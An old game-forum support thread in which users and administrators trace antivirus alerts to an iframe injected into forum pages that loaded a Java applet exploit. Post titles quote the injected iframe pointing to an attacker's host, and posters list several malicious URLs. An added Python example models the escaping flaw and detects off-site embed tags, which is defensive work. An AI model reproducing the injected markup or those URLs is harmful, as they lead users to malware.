
Virus through site?

Discussion in 'Feedback, Suggestions & Support' started by pulli, Aug 29, 2012. | Replies: 58 | Views: 15957

  1. pulli

    pulli IncGamers Member

    Joined:
    Jun 21, 2009
    Messages:
    985
    Likes Received:
    1
    Trophy Points:
    256
    Hi there,

    Can it be that this site is infected with a small virus? My virus scanner seems to trigger on each page load - and I can also verify it manually. Each page load creates an executable in the local application data folder; something like:
    with XXXXXX being random numbers. This executable immediately spawns a process & seems to try (though in a very crude way - virus scanners should immediately notify you) to the Windows registry & startup data.

    I'm not really sure if it is the site - but I keep getting this file each pageload from the forums. And I tested it with other forums and I never get the virus there! The virus is identified with 'IDP.GenericN.5D5293F3'
  2. Dorjan

    Dorjan DiabloNut.Com

    Joined:
    Sep 6, 2010
    Messages:
    282
    Likes Received:
    0
    Trophy Points:
    57
    Hi there. The quantcast tag seemed to have been bringing in a java-app. It has been removed.

    We're investigating what the hell happened but it seems likely they were compromised at this time. We'll keep you informed.

    edit1:
    DO NOT GO TO THIS LINK
    http://www.opengl.org/cache/yCNrSgWJULcGEJJe.html
    DO NOT GO TO THIS LINK

    The link that was posted goes to opengl.org's cache service. This delivers some sort of exe that is run locally. I do not want to investigate the exe so I just terminated it and am now currently scanning my system to see if any damage was done. I'll let you know what you need to do (if anything).

    Hell, this might be a false alarm. Let's hope!

    Still, this had nothing to do with our servers
  3. Elly

    Elly Administrator

    Joined:
    Feb 22, 1997
    Messages:
    4,452
    Likes Received:
    20
    Trophy Points:
    472
    It was a JavaScript tag at quantcast (http://www.quantcast.com/), the site analytics people, which was causing problems. Rush has removed it now as we don't use quantcast any more since moving to Google. I don't know why it was causing a ding though.
  4. Siege Valgore

    Siege Valgore IncGamers Member

    Joined:
    Jul 12, 2011
    Messages:
    926
    Likes Received:
    0
    Trophy Points:
    166
    Smart move going with Google Analytics. They are, and have been for some time now, the best.
  5. pulli

    pulli IncGamers Member

    Joined:
    Jun 21, 2009
    Messages:
    985
    Likes Received:
    1
    Trophy Points:
    256
    just to inform you: it is back (though now "idp.program." is the signature of the threat).
  6. VHD

    VHD IncGamers Member

    Joined:
    May 31, 2012
    Messages:
    134
    Likes Received:
    0
    Trophy Points:
    26
    Yep, I'm still getting alerts that Chrome needs to install a Java plugin.
  7. Diab

    Diab IncGamers Member

    Joined:
    Jun 22, 2003
    Messages:
    3,522
    Likes Received:
    0
    Trophy Points:
    256
  8. The Lord of Darkness

    The Lord of Darkness IncGamers Member

    Joined:
    Dec 13, 2008
    Messages:
    684
    Likes Received:
    0
    Trophy Points:
    165
    This happened to me twice a couple hours ago. What's the deal?
  9. The Lord of Darkness

    The Lord of Darkness IncGamers Member

    Joined:
    Dec 13, 2008
    Messages:
    684
    Likes Received:
    0
    Trophy Points:
    165
    Re: Virus through site?<iframe src=http://www.spiderwebforums.com/mlm/yahoo.html widt

    Do something about your damn site. My AV is going nuts when I visit this site.
  10. NBarnes

    NBarnes IncGamers Member

    Joined:
    Jul 10, 2005
    Messages:
    153
    Likes Received:
    0
    Trophy Points:
    86
    Re: Virus through site?<iframe src=http://www.spiderwebforums.com/mlm/yahoo.html widt

    Is this related to the <iframe src=http://www.spiderwebforums.com html that's being appended to everybody's forum posts?
  11. Varyafirion

    Varyafirion IncGamers Member

    Joined:
    Jul 12, 2005
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    5
    Re: Virus through site?<iframe src=http://www.spiderwebforums.com/mlm/yahoo.html widt

    The forum's definitely been messed with. The iframe seems to have been injected into everything (it's escaped in the posts themselves, but appears parsed elsewhere). It links to a java applet containing exploit code. I had virustotal check it out: https://www.virustotal.com/file/70b...7745406cce4cdb4898458aa3dd2ab5e5b8a/analysis/ . Looks like it's exploiting the "new" exploit in Java, so many people who don't have updated browser plugins are vulnerable to it. The forum needs to be taken offline imo.
  12. Diab

    Diab IncGamers Member

    Joined:
    Jun 22, 2003
    Messages:
    3,522
    Likes Received:
    0
    Trophy Points:
    256
    Re: Virus through site?<iframe src=http://www.spiderwebforums.com/mlm/yahoo.html widt

    Just got this again with the same java thing but with this new url:
    (do not click)
    h ttp://www.spiderwebforums.com/mlm/Orz.class
    (do not click)
  13. Rushster

    Rushster Administrator

    Joined:
    Jun 21, 2003
    Messages:
    756
    Likes Received:
    8
    Trophy Points:
    256
    There is a problem which we are working on now but it takes time to check everything. We are watching it very closely though and hopefully we'll have it fixed up shortly.
  14. krischan

    krischan Europe Trade Moderator

    Joined:
    Aug 17, 2003
    Messages:
    27,121
    Likes Received:
    47
    Trophy Points:
    351
    Every URL about a thread here had that iframe thingy. Maybe somebody wanted to draw the attention to spiderweb.com or launch a DoS attack on them... or just make that impression. Nothing is certain.

    Whatever, the issue seems to be solved now. Firefox still seems to report incgamers as an attacking site, however. It might need some time to get that changed back.

    Java is currently switched off on my browser. Whatever might need it, it will currently not receive the 1001 blessings of my presence :smug:.
  15. morik

    morik IncGamers Member

    Joined:
    Nov 10, 2010
    Messages:
    77
    Likes Received:
    0
    Trophy Points:
    11
    Is there anything those of us who have been visiting the forums need to worry about? (In terms of having picked up any malware?)
  16. Rushster

    Rushster Administrator

    Joined:
    Jun 21, 2003
    Messages:
    756
    Likes Received:
    8
    Trophy Points:
    256
    Wanted to give everyone an update. We have been poring over server logs and poking around the servers. I can say that the servers are all fine. However, after looking over the logs (which we are still doing) we think this is an intentional attack aimed at this community.

    If you are running any sort of virus protection then you will have been OK, same for Chrome users who got an alert bar at the top of the page. However, to be on the safe side I would advise anyone to give their machine a scan, always better to be safe than sorry.

    It is only these forums that have been affected, not the main Diablo site homepage or any other incgamers website.

    Our investigations are ongoing on this and we have got our co-location hosts involved as well as we are not happy about this attack which is obviously malicious aimed at this Diablo community.

    I will be updating this thread as I know more. As of writing this post, the site is clean, despite the Google/FF warnings. These will disappear when FF and Chrome get their act together and remove the warning. I do not know how long they take to update their records so you may get their alerts for a little while longer.
  17. snipeattacker

    snipeattacker IncGamers Member

    Joined:
    Aug 19, 2011
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    41
    I can now enter the forums again without a report from Google that this is an attack site... I have NoScript enabled though to be sure. Sorry I posted on the main page earlier, but it was the only safe place to report it!
  18. Elly

    Elly Administrator

    Joined:
    Feb 22, 1997
    Messages:
    4,452
    Likes Received:
    20
    Trophy Points:
    472
    Thanks for the update. So Google takes about 8 hours to update their records. Thought it would have been quicker.
  19. Varyafirion

    Varyafirion IncGamers Member

    Joined:
    Jul 12, 2005
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    5
    If it was an intentional, non-automated attack, then it wasn't very smart, putting the iframe into posts which are very likely to be escaped. Also just as a note, it seems the navigation bar (e.g. Forum > Diablo: IncGamers, Diablo Wiki & DiabloNut.com > Feedback, Suggestions & Support > Virus through site?) did not look like it escaped HTML tags. You probably have enough on your plate as it is, just putting it out there :) Also, FF no longer blocks the forums. And any info on whether credentials were compromised would be nice too. Good luck!
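    The two observations above (NBarnes: iframe markup appended to every thread; Varyafirion: it renders escaped inside posts but apparently unescaped in the breadcrumb bar) describe one defect: a stored field that is plain text is escaped in one output context and not in another. The script below is an added example written for this thread, not code from the forum software or from any poster. It models that inconsistency with a minimal renderer, then runs a small HTML-parser-based check that a moderator or admin could point at rendered pages to find embedding elements (iframe, script, applet, object, embed) that load from a host other than the site's own. The forum origin `forum.example`, the injected host `injected.example` and the sample title are all constructed placeholders; the real host from the thread is deliberately not used.

```python
"""Model of the 'escaped in posts, raw in the nav bar' defect, plus a
detector for off-site embeds in rendered pages.  Added example; every
host name and sample string here is constructed."""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

SITE_HOST = "forum.example"  # assumed origin of the forum (placeholder)

# Constructed stand-in for a thread title with injected markup.  The host
# is a placeholder, not the one reported in the thread.
INJECTED_TITLE = (
    "Virus through site?"
    "<iframe src=http://injected.example/x.html width=1 height=1>"
)

# Tags that can pull in and execute third-party content.
EMBED_TAGS = {"iframe", "script", "applet", "object", "embed"}
URL_ATTRS = {"src", "data", "codebase"}
TAG_RE = re.compile(r"<\s*(iframe|script|applet|object|embed)\b", re.I)


def render_thread(title, body, escape_nav):
    """Render a minimal thread page: breadcrumb nav, heading, one post.

    The heading and post body are always escaped (posts in the thread
    were reported as showing the iframe harmlessly as text).  The nav bar
    escapes the title only when escape_nav is True; escape_nav=False
    models the defect Varyafirion describes, escape_nav=True the fix.
    """
    nav_title = escape(title, quote=True) if escape_nav else title
    return (
        "<html><body>"
        f"<div class='nav'>Forum &gt; Support &gt; {nav_title}</div>"
        f"<h1>{escape(title, quote=True)}</h1>"
        f"<div class='post'>{escape(body, quote=True)}</div>"
        "</body></html>"
    )


class EmbedFinder(HTMLParser):
    """Collect (tag, url) for embedding elements whose URL is off-site.

    Entity-encoded text such as '&lt;iframe ...&gt;' reaches handle_data,
    not handle_starttag, so escaped markup is correctly ignored here.
    """

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.offsite = []

    def handle_starttag(self, tag, attrs):
        if tag not in EMBED_TAGS:
            return
        for name, value in attrs:
            if name in URL_ATTRS and value:
                host = urlsplit(value).hostname  # None for relative URLs
                if host and host != self.site_host:
                    self.offsite.append((tag, value))


def find_offsite_embeds(html, site_host=SITE_HOST):
    """Return every live embed in `html` that loads from another host."""
    finder = EmbedFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.offsite


def titles_with_markup(titles):
    """Flag stored titles containing embed tags.  A plain-text field should
    never hold these, however well a given template escapes it; this is
    the check to run over the database rather than over rendered pages."""
    return [t for t in titles if TAG_RE.search(t)]


if __name__ == "__main__":
    buggy = render_thread(INJECTED_TITLE, "hello", escape_nav=False)
    fixed = render_thread(INJECTED_TITLE, "hello", escape_nav=True)
    print("unescaped nav:", find_offsite_embeds(buggy))
    print("escaped nav:  ", find_offsite_embeds(fixed))
    print("stored titles flagged:", titles_with_markup(["ok", INJECTED_TITLE]))
```

Running it shows the same stored title producing a live off-site iframe in the unescaped breadcrumb and nothing in the escaped version; the database-side check flags the title either way, which is the more useful signal during cleanup since it does not depend on which template happened to render it.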
  20. Rushster

    Rushster Administrator

    Joined:
    Jun 21, 2003
    Messages:
    756
    Likes Received:
    8
    Trophy Points:
    256
    Regarding credentials, there is certainly no evidence of that from our log checking and scans.

    Just as another update, an external audit of the server is running at the moment which will also help us see what was up.
